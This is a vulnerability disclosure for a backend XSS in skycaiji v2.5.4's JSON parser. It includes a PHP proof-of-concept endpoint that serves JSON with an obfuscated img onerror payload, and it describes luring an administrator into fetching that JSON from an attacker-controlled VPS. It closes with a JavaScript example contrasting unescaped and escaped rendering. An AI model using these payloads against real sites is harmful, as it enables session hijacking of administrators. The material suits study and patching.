skycaiji-v2.5.4 has a backend XSS vulnerability

First, download the source code from the following site:

https://down.chinaz.com/api/index/download?id=38972&type=code

Place it directly in the root directory of the website, browse to the server's IP address, and follow the prompts to install.

After installation, log in to the backend.

image-20230502232501330

Open the function shown above.

This is a JSON parsing function, but it has no complete XSS protection in place.

We can host a file of our own that returns JSON containing an XSS payload. When the function fetches and parses that JSON, the XSS code is triggered in the backend.

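<?php
// Proof-of-concept endpoint: returns JSON whose "name" field carries HTML markup.
$data = array(
// The character codes in the onerror handler decode to alert('XSS').
'name' => 'John <img src=\'x\' onerror=\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\">',
'age' => 30,
'email' => 'johndoe@example.com',
);

$json = json_encode($data);

// Serve the encoded array as a JSON response.
header('Content-type: application/json');
echo $json;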

This code returns JSON data carrying a malicious payload.

We deploy it on our own VPS and induce the backend administrator to parse its data. The XSS code is then triggered successfully:

image-20230502232849580

image-20230502232855722

Attackers can use this vulnerability to do anything that JavaScript code can do.
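
The missing protection described above, shown as an added example that is not skycaiji's own code: a JSON preview that concatenates remote values into HTML, next to the same renderer with output encoding applied to every key and value. The function names, the sample response and the assumption that the preview builds HTML from the parsed document are illustrative; the post does not show the actual sink.

```javascript
// Added example (not skycaiji code). Assumption: the JSON preview turns the
// fetched document into HTML for the admin page; the real sink is not shown.

// Constructed sample response, same shape as the PHP file above.
const SAMPLE_BODY = JSON.stringify({
  name: "John <img src='x' onerror=\"alert(1)\">",
  age: 30,
  email: "johndoe@example.com",
  "<i>key</i>": { tags: ["<script>alert(2)</script>", null] },
});

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode a scalar for an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Walk the parsed JSON and emit nested lists. `encode` is applied to every
// key and every scalar leaf, because object keys are attacker-controlled too.
function renderTree(node, encode) {
  if (node === null || typeof node !== "object") {
    return encode(node);
  }
  const items = Object.entries(node).map(
    ([key, value]) => `<li><b>${encode(key)}</b>: ${renderTree(value, encode)}</li>`
  );
  return `<ul>${items.join("")}</ul>`;
}

// Weak form: remote strings are concatenated into markup unchanged.
function renderUnsafe(body) {
  return renderTree(JSON.parse(body), String);
}

// Hardened form: same output structure, every remote value encoded.
function renderSafe(body) {
  return renderTree(JSON.parse(body), escapeHtml);
}

console.log(renderUnsafe(SAMPLE_BODY));
console.log(renderSafe(SAMPLE_BODY));
```

Encoding at the point of output is what closes the hole; the fetched JSON stays untrusted no matter which host served it.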